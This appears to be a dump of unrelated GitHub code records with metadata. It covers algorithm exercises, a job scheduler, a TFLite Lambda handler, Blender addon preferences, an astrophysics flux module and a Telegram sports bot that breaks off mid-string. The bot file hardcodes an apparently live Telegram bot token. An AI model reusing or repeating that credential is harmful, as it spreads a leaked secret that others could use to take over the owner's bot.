fracs.append(Fraction(*map(int, input().split())))\n result = product(fracs)\n print(*result)\n","repo_name":"yxmauw/HackerRank","sub_path":"Medium/Reduce Function.py","file_name":"Reduce Function.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5622990782","text":"import numpy as np\n\n\ndef greedy_scheduler(jobs, method):\n\n # Check jobs array has correct number of columns (2: weights and lengths).\n if jobs.shape[1] != 2:\n raise(NameError, \"Incorrect number of columns in jobs argument\")\n\n if method == \"difference\":\n # score of each job is its weight minus length\n scores = jobs[:, 0] - jobs[:, 1]\n elif method == \"ratio\":\n # score of each job is its weight divided be its length\n scores = jobs[:, 0] / jobs[:, 1]\n else:\n # method argument is not defined\n raise (NameError, \"Invalid method argument\")\n\n job_order = np.lexsort((jobs[:, 0], scores))[::-1]\n completion_times = np.cumsum(jobs[job_order,1])\n cost = np.sum(completion_times * jobs[:,0])\n\n return cost\n","repo_name":"albertwildeman/Greedy-Scheduling","sub_path":"GreedySchedulerLib.py","file_name":"GreedySchedulerLib.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35437934053","text":"from ast import List\nfrom collections import defaultdict\nfrom collections import deque \nfrom collections import Counter\nimport heapq\nimport math\n\n# Problem 1 - Sliding Window Maximum\n\"\"\"\n* * HARD PROBLEM\nYou are given an array of integers nums, there is a sliding window of size k which is moving \nfrom the very left of the array to the very right. You can only see the k numbers in the window. \nEach time the sliding window moves right by one position.\n\nReturn the max sliding window.\n\nExample 1:\nInput: nums = [1,3,-1,-3,5,3,6,7], k = 3\nOutput: [3,3,5,5,6,7]\nExplanation: \nWindow position Max\n--------------- -----\n[1 3 -1] -3 5 3 6 7 3\n 1 [3 -1 -3] 5 3 6 7 3\n 1 3 [-1 -3 5] 3 6 7 5\n 1 3 -1 [-3 5 3] 6 7 5\n 1 3 -1 -3 [5 3 6] 7 6\n 1 3 -1 -3 5 [3 6 7] 7\n\"\"\"\n# Uses the concept of monotonic decreasing queue\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n result = []\n q = deque() # q will store indices\n\n l, r = 0, 0\n while r < len(nums):\n # push the element to the queue\n # but before pushing check whether queue follows monotonic decreasing property\n while q and nums[q[-1]] < nums[r]:\n q.pop()\n # now we push the element\n q.append(r)\n\n # if element is out-of bound in the sliding window\n # remove it from the queue\n if l > q[0]:\n q.popleft()\n\n # if window is of size k\n if (r + 1) >= k:\n result.append(nums[q[0]])\n l += 1\n\n r += 1\n\n return result\n\n\n\n\n# 2. Minimum Window Substring\n\"\"\"\nhttps://leetcode.com/problems/minimum-window-substring\nGiven two strings s and t of lengths m and n respectively, return the minimum window \nsubstring of s such that every character in t (including duplicates) is included in the window. \nIf there is no such substring, return the empty string \"\".\n\nThe testcases will be generated such that the answer is unique.\n\nInput: s = \"ADOBECODEBANC\", t = \"ABC\"\nOutput: \"BANC\"\nExplanation: The minimum window substring \"BANC\" includes 'A', 'B', and 'C' from string t.\n\"\"\"\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n if not t: return \"\"\n\n t_count = Counter(t)\n s_count = {k : 0 for k, _ in t_count.items()}\n\n having, needed = 0, len(t_count)\n\n res = \"\"\n minLength = math.inf\n\n l, r = 0, 0\n while r < len(s):\n if s[r] in t_count:\n s_count[s[r]] += 1\n # we will increment having iff both counter values are same\n if s_count[s[r]] == t_count[s[r]]:\n having += 1\n\n while having == needed and l <= r:\n window_size = r - l + 1\n if window_size < minLength:\n res = s[l:r+1]\n minLength = window_size\n\n if s[l] in s_count:\n s_count[s[l]] -= 1\n if s_count[s[l]] < t_count[s[l]]:\n having -= 1\n\n l += 1\n\n r += 1\n\n return res\n\n\n\n\n# 3. Longest Repeating Character Replacement\n\"\"\"\nhttps://leetcode.com/problems/longest-repeating-character-replacement/\nYou are given a string s and an integer k. You can choose any character of the string \nand change it to any other uppercase English character. You can perform this operation \nat most k times.\n\nReturn the length of the longest substring containing the same letter you can get after \nperforming the above operations.\n\nInput: s = \"ABAB\", k = 2\nOutput: 4\nExplanation: Replace the two 'A's with two 'B's or vice versa.\n\nInput: s = \"AABABBA\", k = 1\nOutput: 4\nExplanation: Replace the one 'A' in the middle with 'B' and form \"AABBBBA\".\nThe substring \"BBBB\" has the longest repeating letters, which is 4.\n\"\"\"\n# Sliding window validation equation \n# windowLen - count(most_freq_char) <= k \nclass Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n count = {}\n res = 0\n\n l = 0\n maxf = 0\n for r in range(len(s)):\n count[s[r]] = 1 + count.get(s[r], 0)\n maxf = max(maxf, count[s[r]])\n\n if (r - l + 1) - maxf > k:\n count[s[l]] -= 1\n l += 1\n\n res = max(res, r - l + 1)\n return res\n\n\n\n\n# 4. Longest Substring Without Repeating Characters\n\"\"\"\nhttps://leetcode.com/problems/longest-substring-without-repeating-characters/\nGiven a string s, find the length of the longest \nsubstring without repeating characters.\n\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\nInput: s = \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\nNotice that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n\"\"\"\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n charSet = set()\n l = 0\n res = 0\n\n for r in range(len(s)):\n while s[r] in charSet:\n charSet.remove(s[l])\n l += 1\n charSet.add(s[r])\n res = max(res, r - l + 1)\n return res\n\n\n\n\n# 5. Number of Sub-arrays of Size K and Average Greater than or Equal to Threshold\n\"\"\"\nhttps://leetcode.com/problems/number-of-sub-arrays-of-size-k-and-average-greater-than-or-equal-to-threshold/\nGiven an array of integers arr and two integers k and threshold, return the number of \nsub-arrays of size k and average greater than or equal to threshold.\n\nInput: arr = [2,2,2,2,5,5,5,8], k = 3, threshold = 4\nOutput: 3\nExplanation: Sub-arrays [2,5,5],[5,5,5] and [5,5,8] have averages 4, 5 and 6 respectively. \nAll other sub-arrays of size 3 have averages less than 4 (the threshold).\n\"\"\"\nclass Solution:\n def numOfSubarrays(self, arr: List[int], k: int, threshold: int) -> int:\n res = 0\n curSum = sum(arr[:k-1])\n\n for L in range(len(arr) - k + 1):\n curSum += arr[L + k - 1]\n if (curSum / k) >= threshold:\n res += 1\n curSum -= arr[L]\n return res\n\n\n\n\n# 6. Contains Duplicate II\n\"\"\"\nhttps://leetcode.com/problems/contains-duplicate-ii/\nGiven an integer array nums and an integer k, return true if there are two \ndistinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\n\nInput: nums = [1,2,3,1], k = 3\nOutput: true\n\nInput: nums = [1,2,3,1,2,3], k = 2\nOutput: false\n\"\"\"\n# Note here the sliding window size will be k + 1 bcoz of this condition abs(i - j) <= k\nclass Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n window = set()\n L = 0\n\n for R in range(len(nums)):\n if R - L > k:\n window.remove(nums[L])\n L += 1\n if nums[R] in window:\n return True\n window.add(nums[R])\n return False\n\n\n\n\n# 7. Best Time to Buy and Sell Stock\n\"\"\"\nhttps://leetcode.com/problems/best-time-to-buy-and-sell-stock/\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a \ndifferent day in the future to sell that stock.\n\nReturn the maximum profit you can achieve from this transaction. \nIf you cannot achieve any profit, return 0.\n\nInput: prices = [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\nNote that buying on day 2 and selling on day 1 is not allowed because you must buy before you sell.\n\"\"\"\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n l, r = 0, 1 # l is buy & r is sell\n max_profit = 0\n\n while r < len(prices):\n if prices[l] < prices[r]:\n profit = prices[r] - prices[l]\n max_profit = max(profit, max_profit)\n else:\n l = r\n r += 1\n\n return max_profit \n\n\n\n\n# 8. Subarray Product Less Than K\n\"\"\"\nhttps://leetcode.com/problems/subarray-product-less-than-k/\nGiven an array of integers nums and an integer k, return the number of contiguous subarrays \nwhere the product of all the elements in the subarray is strictly less than k.\n\nInput: nums = [10,5,2,6], k = 100\nOutput: 8\nExplanation: The 8 subarrays that have product less than 100 are:\n[10], [5], [2], [6], [10, 5], [5, 2], [2, 6], [5, 2, 6]\nNote that [10, 5, 2] is not included as the product of 100 is not strictly less than k.\n\"\"\"\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n # using sliding window technique\n l, r = 0, 0\n prod = 1\n count = 0\n while r < len(nums):\n prod = prod * nums[r]\n \n while l < len(nums) and prod >= k:\n prod = prod / nums[l]\n l += 1\n\n if prod < k:\n count += (r - l + 1)\n \n r += 1\n\n return count\n \n\n\n\n# 9. Max Consecutive Ones III\n\"\"\"\n* * Important question\nhttps://leetcode.com/problems/max-consecutive-ones-iii\nGiven a binary array nums and an integer k, return the maximum number of consecutive 1's in \nthe array if you can flip at most k 0's.\n\nInput: nums = [1,1,1,0,0,0,1,1,1,1,0], k = 2\nOutput: 6\nExplanation: [1,1,1,0,0,1,1,1,1,1,1]\n -----------\nBolded numbers were flipped from 0 to 1. The longest subarray is underlined.\n\"\"\"\nclass Solution:\n def longestOnes(self, nums: List[int], k: int) -> int:\n res = 0\n\n l, r = 0, 0\n cnt = 0\n while r < len(nums):\n if nums[r] == 0:\n cnt += 1\n\n # sliding window shrinking condition cnt <= k\n while cnt > k:\n if nums[l] == 0:\n cnt -= 1\n l += 1\n\n res = max(res, (r - l) + 1)\n r += 1\n\n return res\n","repo_name":"chafale/Data-Structure-and-Algorithms","sub_path":"5_Sliding Window.py","file_name":"5_Sliding Window.py","file_ext":"py","file_size_in_byte":10047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14088426160","text":"import json\nimport tflite_runtime.interpreter as tflite\nfrom keras_image_helper import create_preprocessor\n\n\nmodel = 'cats-dogs-v2.tflite'\npreprocessor = create_preprocessor('xception', target_size=(150, 150))\n\ninterpreter = tflite.Interpreter(model_path=model)\ninterpreter.allocate_tensors()\n\n\ninput_index = interpreter.get_input_details()[0]['index']\noutput_index = interpreter.get_output_details()[0]['index']\n\n\ndef predict(url):\n X = preprocessor.from_url(url)\n interpreter.set_tensor(input_index, X)\n interpreter.invoke()\n pred = interpreter.get_tensor(output_index)\n return pred[0].tolist()\n\n\ndef lambda_handler(event, context):\n # print(\"parameters:\", event)\n url = event['url']\n results = predict(url)\n return results\n","repo_name":"RickyMcMaster/pub_portfolio","sub_path":"mlz/09-serverless/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25276112042","text":"\r\nMOD = int(1e9) + 7\r\n\r\ndef main():\r\n buf = input()\r\n L = list(map(int, list(buf)))\r\n L.reverse()\r\n # 片側が0なら自明\r\n # 繰り上がりが発生しない場合は条件を満たす\r\n # 1つの数値に対して2^(1の数)通り\r\n bit1 = 2\r\n bit_list = []\r\n pow2 = [1]\r\n for i in range(len(L)):\r\n bit_list.append(bit1)\r\n bit1 = (bit1 * 3) % MOD\r\n pow2.append((pow2[-1] * 2) % MOD)\r\n pattern = 1\r\n print(L)\r\n print(bit_list)\r\n for i, x in enumerate(L):\r\n if x == 0:\r\n pattern = (pattern - bit_list[i]) % MOD\r\n else: # x == 1\r\n pattern = (pattern + bit_list[i]) % MOD\r\n print(pattern)\r\n\r\n#2\r\n#2 4\r\n#2 4 4 8\r\n#2 4 4 8 4 8 8 16\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"takumi152/atcoder","sub_path":"abc129e.py","file_name":"abc129e.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43220718","text":"import bpy\n\nfrom ezdxf_exporter.core.preferences.misc import draw_preferences_misc\nfrom ezdxf_exporter.data.color.ui import draw_preferences_aci\nfrom ezdxf_exporter.data.layer.ui import draw_preferences_layer\nfrom ezdxf_exporter.data.unit.ui import draw_preferences_unit\nfrom ezdxf_exporter.core.preferences.dependencies import draw_preferences_dependencies\n\nfrom ezdxf_exporter.core.preferences.dependencies import dependencies_installed\n\nfrom .prop import Settings\n\n\ndraw_prefs_map = {\n \"palette_aci\": draw_preferences_aci,\n \"layer\": draw_preferences_layer,\n \"unit\": draw_preferences_unit,\n \"dependencies\": draw_preferences_dependencies,\n \"misc\": draw_preferences_misc,\n}\n\n\nclass DXFEXPORTERAddonPreferences(bpy.types.AddonPreferences):\n bl_idname = \"ezdxf_exporter\"\n\n category: bpy.props.EnumProperty(\n items=(\n (\"misc\", \"Misc.\", \"\"),\n (\"palette_aci\", \"ACI Palette\", \"\"),\n (\"layer\", \"Layers\", \"\"),\n (\"unit\", \"Units\", \"\"),\n (\"dependencies\", \"Dependencies\", \"\"),\n )\n )\n settings: bpy.props.PointerProperty(type=Settings)\n\n def draw(self, context):\n layout = self.layout\n if dependencies_installed:\n row = layout.row()\n row.prop_tabs_enum(self, \"category\")\n\n draw_prefs_map.get(self.category)(self.settings, layout.box())\n else:\n draw_preferences_dependencies(None, layout)\n","repo_name":"Gorgious56/blender_ezdxf_exporter","sub_path":"core/preferences/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"20359601647","text":"# -*- coding: utf-8 -*-\nfrom .ops import (\n RxOp,\n tensordotRzOp,\n special_tensordotRzOp,\n rTA1Op,\n rTA1LOp,\n CheckBoundsOp,\n)\nfrom .wigner import R\nfrom .defaults import defaults\nfrom .math import cast\nfrom .compat import theano, tt, ifelse\nfrom scipy.special import gamma, hyp2f1\nimport numpy as np\nfrom tqdm import tqdm\nimport os\n\n\n__all__ = [\"FluxIntegral\"]\n\n\nclass FluxIntegral:\n def __init__(\n self,\n mean_ylm,\n cov_ylm,\n udeg=defaults[\"udeg\"],\n marginalize_over_inclination=defaults[\"marginalize_over_inclination\"],\n covpts=defaults[\"covpts\"],\n ydeg=defaults[\"ydeg\"],\n **kwargs\n ):\n\n # General\n self._udeg = udeg\n self._marginalize_over_inclination = marginalize_over_inclination\n self._covpts = covpts\n self._mean_ylm = mean_ylm\n self._cov_ylm = cov_ylm\n self._ydeg = ydeg\n self._nylm = (self._ydeg + 1) ** 2\n self._angle_fac = np.pi / 180\n\n # Set up the ops\n self._special_tensordotRz = special_tensordotRzOp(ydeg, **kwargs)\n self._tensordotRz = tensordotRzOp(ydeg, **kwargs)\n self._Rx = RxOp(ydeg, **kwargs)\n self._R = R(\n self._ydeg, cos_alpha=0, sin_alpha=1, cos_gamma=0, sin_gamma=-1\n )\n self._CC = tt.extra_ops.CpuContiguous()\n\n # Get the moments of the Ylm process in the polar frame\n self._ez = tt.transpose(\n self._dotRx(tt.reshape(self._mean_ylm, (1, -1)), 0.5 * np.pi)\n )\n mom2 = self._CC(\n self._cov_ylm + tt.outer(self._mean_ylm, self._mean_ylm)\n )\n tmp = self._CC(tt.transpose(self._dotRx(mom2, 0.5 * np.pi)))\n self._Ez = self._dotRx(tmp, 0.5 * np.pi)\n\n # Pre-compute stuff that doesn't depend on user inputs\n self._precompute()\n\n # These parameters are star-specific and are set in\n # calls to `mean()` and `cov()`.\n self._t = None\n self._i = None\n self._p = None\n self._u = None\n\n def _dotRx(self, M, theta):\n f = tt.zeros_like(M)\n rx = self._Rx(theta)[0]\n nwig = lambda l: ((l + 1) * (2 * l + 1) * (2 * l + 3)) // 3\n for l in range(self._ydeg + 1):\n start = nwig(l - 1)\n stop = nwig(l)\n Rxl = tt.reshape(rx[start:stop], (2 * l + 1, 2 * l + 1))\n f = tt.set_subtensor(\n f[:, l ** 2 : (l + 1) ** 2],\n tt.dot(M[:, l ** 2 : (l + 1) ** 2], Rxl),\n )\n return f\n\n def _right_project(self, M, theta, inc):\n \"\"\"Apply the projection operator on the right.\n\n Specifically, this method returns the dot product `M . R`,\n where `M` is an input matrix and `R` is the Wigner rotation matrix\n that transforms a spherical harmonic coefficient vector in the\n input frame to a vector in the observer's frame.\n \"\"\"\n # Rotate to the sky frame\n M = self._dotRx(M, -inc)\n\n # Rotate to the correct phase\n M = self._tensordotRz(M, theta)\n\n # Rotate to the polar frame\n M = self._dotRx(M, 0.5 * np.pi)\n\n return M\n\n def _G(self, j, i):\n \"\"\"\n This is the integral of\n\n cos(x / 2)^i sin(x / 2)^j sin(x)\n\n from 0 to pi/2.\n \"\"\"\n return 2 * gamma(1 + 0.5 * i) * gamma(1 + 0.5 * j) / gamma(\n 0.5 * (4 + i + j)\n ) - (2 ** (1 - 0.5 * i) / (2 + i)) * hyp2f1(\n 1 + 0.5 * i, -0.5 * j, 2 + 0.5 * i, 0.5\n )\n\n def _precompute(self):\n \"\"\"\n Pre-compute some stuff that doesn't depend on\n user inputs.\n\n \"\"\"\n # First, we can pre-compute a bunch of stuff\n # using `numpy`, as it doesn't depend on tensor\n # variables.\n\n # The marginalization integral\n G = np.array(\n [\n [self._G(i, j) for i in range(4 * self._ydeg + 1)]\n for j in range(4 * self._ydeg + 1)\n ]\n )\n\n # First moment integral\n self._wnp = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n m = np.arange(-l, l + 1)\n i = slice(l ** 2, (l + 1) ** 2)\n self._wnp[l] = self._R[l] @ G[l - m, l + m]\n\n # Second moment integral. Apologies for\n # how opaque this all is, since it's the result of\n # a few hours of tinkering with linear algebra to\n # maximize the number of operations *before*\n # we get theano involved.\n Q = np.empty(\n (\n 2 * self._ydeg + 1,\n 2 * self._ydeg + 1,\n 2 * self._ydeg + 1,\n self._nylm,\n )\n )\n for l1 in range(self._ydeg + 1):\n k = np.arange(l1 ** 2, (l1 + 1) ** 2)\n k0 = np.arange(2 * l1 + 1).reshape(-1, 1)\n for p in range(self._nylm):\n l2 = int(np.floor(np.sqrt(p)))\n j = np.arange(l2 ** 2, (l2 + 1) ** 2)\n j0 = np.arange(2 * l2 + 1).reshape(1, -1)\n L = (\n self._R[l1][l1, k - l1 ** 2]\n @ G[k0 + j0, 2 * l1 - k0 + 2 * l2 - j0]\n )\n R = self._R[l2][j - l2 ** 2, p - l2 ** 2].T\n Q[l1, : 2 * l1 + 1, : 2 * l2 + 1, p] = L @ R\n self._Wnp = np.empty((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2)\n self._Wnp[i.reshape(-1, 1), j.reshape(1, -1)] = Q[\n l1, : 2 * l1 + 1, l2, j\n ].T\n\n def _compute_inclination_integrals(self):\n\n # In the computation of the second moment below, we implicitly\n # make use of the fact that `rTA1 = 0` if `m != 0` because\n # of symmetry. This vastly reduces the number of operations\n # we need to do!\n\n if self._udeg > 0:\n\n # Flux integral op\n self._rTA1 = rTA1LOp(ydeg=self._ydeg, udeg=self._udeg)(self._u)\n\n # First moment\n self._w = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n i = slice(l ** 2, (l + 1) ** 2)\n self._w[l] = tt.dot(self._rTA1[i], self._wnp[l])\n\n # Second moment\n m0 = np.array([l ** 2 + l for l in range(self._ydeg + 1)])\n Z = tt.outer(self._rTA1[m0], self._rTA1[m0])\n self._W = tt.zeros((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2).reshape(-1, 1)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2).reshape(1, -1)\n self._W = tt.set_subtensor(\n self._W[i, j], self._Wnp[i, j] * Z[l1, l2]\n )\n\n else:\n\n # Get the numeric value of the flux op, since it\n # doesn't depend on any user inputs\n self._rTA1 = rTA1Op(ydeg=self._ydeg)().eval()\n\n # First moment\n self._w = [None for l in range(self._ydeg + 1)]\n for l in range(self._ydeg + 1):\n i = slice(l ** 2, (l + 1) ** 2)\n self._w[l] = self._rTA1[i] @ self._wnp[l]\n\n # Second moment\n m0 = np.array([l ** 2 + l for l in range(self._ydeg + 1)])\n Z = np.outer(self._rTA1[m0], self._rTA1[m0])\n self._W = np.zeros((self._nylm, self._nylm))\n for l1 in range(self._ydeg + 1):\n i = np.arange(l1 ** 2, (l1 + 1) ** 2).reshape(-1, 1)\n for l2 in range(self._ydeg + 1):\n j = np.arange(l2 ** 2, (l2 + 1) ** 2).reshape(1, -1)\n self._W[i, j] = self._Wnp[i, j] * Z[l1, l2]\n\n def _set_params(self, t, i, p, u):\n # Ingest\n t = cast(t, vectorize=True)\n i = CheckBoundsOp(name=\"i\", lower=0, upper=0.5 * np.pi)(\n i * self._angle_fac\n )\n p = CheckBoundsOp(name=\"p\", lower=0, upper=np.inf)(p)\n u = cast(u, vectorize=True)[: self._udeg]\n\n # Check if they are different from the cached variables\n if (\n (self._t != t)\n or (self._i != i)\n or (self._p != p)\n or (self._u != u)\n ):\n # We need to re-compute everything\n self._t = t\n self._i = i\n self._p = p\n self._u = u\n self._compute()\n\n def _interpolate_cov(self):\n \"\"\"\n Interpolate the pre-computed kernel onto a\n grid of time lags in 2D to get the full covariance.\n\n \"\"\"\n theta = 2 * np.pi * tt.mod(self._t / self._p, 1.0)\n x = tt.reshape(tt.abs_(theta[:, None] - theta[None, :]), (-1,))\n inds = tt.cast(tt.floor(x / self._dx), \"int64\")\n x0 = (x - self._xp[inds + 1]) / self._dx\n cov = tt.reshape(\n self._a0[inds]\n + self._a1[inds] * x0\n + self._a2[inds] * x0 ** 2\n + self._a3[inds] * x0 ** 3,\n (theta.shape[0], theta.shape[0]),\n )\n\n # If len(theta) == 1, return the *variance* instead\n cov = ifelse(tt.eq(theta.shape[0], 1), self._var, cov)\n return cov\n\n def _design_matrix(self):\n theta = 2 * np.pi * tt.mod(self._t / self._p, 1.0)\n rTA1 = tt.tile(self._rTA1, (theta.shape[0], 1))\n return self._right_project(rTA1, theta, self._i)\n\n def _compute(self):\n \"\"\"\n Compute some vectors and matrices used in the\n evaluation of the mean and covariance.\n\n \"\"\"\n # Compute some helper matrices\n self._compute_inclination_integrals()\n\n # If we're marginalizing over inclination, pre-compute the\n # radial kernel on a fine grid, then interpolate onto the\n # provided time array.\n if self._marginalize_over_inclination:\n\n # Compute the scalar mean\n self._mean = tt.sum(\n [\n tt.dot(self._w[l], self._ez[slice(l ** 2, (l + 1) ** 2)])\n for l in range(self._ydeg + 1)\n ]\n )\n\n # Compute the *variance*\n self._var = (\n tt.tensordot(self._W, self._Ez) - self._mean ** 2\n ) * tt.eye(1)\n\n # Evaluate the kernel on a regular 1d grid in theta\n self._dx = 2 * np.pi / self._covpts\n self._xp = tt.arange(\n -self._dx, 2 * np.pi + 2.5 * self._dx, self._dx\n )\n\n # Compute the batched tensor dot product T_ij R_ilk M_lj\n mom2 = self._special_tensordotRz(self._W, self._Ez, self._xp)\n\n # The actual covariance\n yp = mom2 - self._mean ** 2\n\n # Compute the interpolant\n y0 = yp[:-3]\n y1 = yp[1:-2]\n y2 = yp[2:-1]\n y3 = yp[3:]\n self._a0 = y1\n self._a1 = -y0 / 3.0 - 0.5 * y1 + y2 - y3 / 6.0\n self._a2 = 0.5 * (y0 + y2) - y1\n self._a3 = 0.5 * ((y1 - y2) + (y3 - y0) / 3.0)\n\n # Compute the covariance\n self._cov = self._interpolate_cov()\n\n else:\n\n A = self._design_matrix()\n\n # Compute the scalar mean\n self._mean = tt.dot(A, self._mean_ylm)[0]\n\n # Compute the covariance\n self._cov = tt.dot(tt.dot(A, self._cov_ylm), tt.transpose(A))\n\n def design_matrix(self, t, i, p, u):\n \"\"\"\n\n \"\"\"\n self._set_params(t, i, p, u)\n return self._design_matrix()\n\n def kernel(self, t, i, p, u):\n \"\"\"\n\n \"\"\"\n self._set_params(t, i, p, u)\n if self._marginalize_over_inclination:\n mom2 = self._special_tensordotRz(\n self._W,\n self._Ez,\n 2 * np.pi * tt.mod(tt.reshape(self._t, (-1,)) / self._p, 1.0),\n )\n return mom2 - self._mean ** 2\n else:\n return self._cov[0]\n\n def mean(self, t, i, p, u):\n \"\"\"\n\n \"\"\"\n self._set_params(t, i, p, u)\n return self._mean * tt.ones_like(self._t)\n\n def cov(self, t, i, p, u):\n \"\"\"\n\n \"\"\"\n self._set_params(t, i, p, u)\n return self._cov\n","repo_name":"rodluger/starry_process","sub_path":"starry_process/flux.py","file_name":"flux.py","file_ext":"py","file_size_in_byte":12350,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"28500405130","text":"\r\nimport telebot\r\nimport requests\r\n\r\n# a ListNode class for the cache\r\nclass ListNode:\r\n\r\n def __init__(self, value = -1, prev=None, next=None):\r\n self.next = next\r\n self.prev = prev\r\n self.value = value\r\n\r\n\r\n# LRU Cache class to keep users who recently sent a massage\r\nclass Cache:\r\n\r\n def __init__(self):\r\n self.capacity = 10\r\n self.linked_list_head = ListNode() # head_dummy\r\n self.linked_list_tail = self.linked_list_head\r\n self.linked_list_tail = self.linked_list_tail\r\n self.key_to_value = {}\r\n self.key_to_node = {}\r\n self.size = 0\r\n\r\n def get_value(self, key: int) -> dict:\r\n if key not in self.key_to_value: # key is not in the dict\r\n return -1\r\n\r\n else: # key is in the dict, move the node to the end of the linked list\r\n self.remove_from_linked_list_and_update_value(key, self.key_to_value[key])\r\n self.add_to_linked_list_and_update_node(key, self.key_to_value[key])\r\n\r\n\r\n return self.key_to_value[key]\r\n\r\n def put_or_update(self, key: int, value: dict) -> None:\r\n\r\n # remove the node from the list if the key is in the dict\r\n if key in self.key_to_value:\r\n self.remove_from_linked_list_and_update_value(key, value)\r\n\r\n # add the key if not in the dict\r\n else:\r\n self.size += 1\r\n self.key_to_value[key] = value\r\n\r\n # create the new node and add to the end of the list\r\n self.add_to_linked_list_and_update_node(key, value)\r\n\r\n # remove the first node from the linked list if the size is bigger than the capacity\r\n if self.size > self.capacity:\r\n node_to_remove = self.linked_list_head.next\r\n self.key_to_value.pop(node_to_remove.value)\r\n self.key_to_node.pop(node_to_remove.value)\r\n\r\n self.linked_list_head.next = node_to_remove.next\r\n\r\n if node_to_remove.next:\r\n node_to_remove.next.prev = self.linked_list_head\r\n\r\n else: # node_to_remove wat the tail\r\n self.linked_list_tail = self.linked_list_head\r\n\r\n def remove_from_linked_list_and_update_value(self, key: str, value: dict) -> None:\r\n self.key_to_value[key] = value\r\n node = self.key_to_node[key]\r\n node.prev.next = node.next\r\n\r\n if node.next:\r\n node.next.prev = node.prev\r\n\r\n else: # node is the tail\r\n self.linked_list_tail = node.prev\r\n\r\n def add_to_linked_list_and_update_node(self, key: str, value: dict) -> None:\r\n new_node = ListNode(key)\r\n self.linked_list_tail.next = new_node\r\n new_node.prev = self.linked_list_tail\r\n self.key_to_node[key] = new_node\r\n self.linked_list_tail = new_node\r\n\r\n\r\n# telegram api info\r\ntelegram_token = \"6840332720:AAH3TnoPdotUZEanvXK4Simz9hYwDSrBV5s\"\r\nbot = telebot.TeleBot(telegram_token)\r\n\r\n# football api info, using \"https://www.thesportsdb.com/api.php\"\r\nfootball_api_key = \"3\" \r\n\r\n# basketball api info, using \"https://www.balldontlie.io/home.html#get-all-players\"\r\nbasketball_url = \"https://www.balldontlie.io/api/v1/players\"\r\n\r\n# basketball functions\r\ndef get_nba_player_team(player_name: str) -> str: # # gets a player's name, and return his team\r\n params = {\"page\": 0, \"per_page\": 1, \"search\": player_name}\r\n response = requests.get(basketball_url, params)\r\n player_data = response.json()\r\n\r\n if player_data and player_data[\"data\"]:\r\n player_team = player_data[\"data\"][0][\"team\"][\"full_name\"]\r\n return player_team\r\n\r\n return \"could not find the player\"\r\n\r\n# football functions:\r\ndef get_footballer_team(player_name: str) -> str: # gets a player's name, and return his team\r\n\r\n # get the player's id first\r\n football_url = f\"https://www.thesportsdb.com/api/v1/json/{football_api_key}/searchplayers.php?p={player_name}\" \r\n response = requests.get(football_url) \r\n player_data = response.json() \r\n \r\n # Check if the player exists\r\n if player_data and player_data[\"player\"] and player_data[\"player\"][0][\"strSport\"] == \"Soccer\":\r\n player_id = player_data[\"player\"][0][\"idPlayer\"]\r\n\r\n else: \r\n return \"could not find the player\"\r\n \r\n # find the player's team using his id\r\n player_url = f\"https://www.thesportsdb.com/api/v1/json/{football_api_key}/lookupplayer.php?id={player_id}\"\r\n response = requests.get(player_url)\r\n player_team_data = response.json()\r\n team_name = player_team_data[\"players\"][0].get(\"strTeam\")\r\n return team_name\r\n\r\n# dict to map user_id to his current state\r\nuser_to_state = Cache()\r\n\r\n# handle a massage to the telegram bot:\r\n@bot.message_handler(func=lambda message: True) \r\ndef handle_message(message):\r\n \r\n user_id = message.from_user.id\r\n if user_to_state.get_value(user_id) == -1: # user is not in the cache\r\n user_to_state.put_or_update(user_id, {\"is_sent_welcome\": False, \"is_chosen_football\": False, \"is_chosen_basketball\": False})\r\n \r\n answer = message.text\r\n\r\n if not user_to_state.get_value(user_id)[\"is_sent_welcome\"]: # need to send a weolcome message\r\n bot.reply_to(message, \"hello! please choose the sport you're intrested in: football or basketball\")\r\n user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": False, \"is_chosen_basketball\": False})\r\n\r\n elif answer == \"football\": # the user chose football\r\n bot.reply_to(message, \"please provide a footballer's name, and i 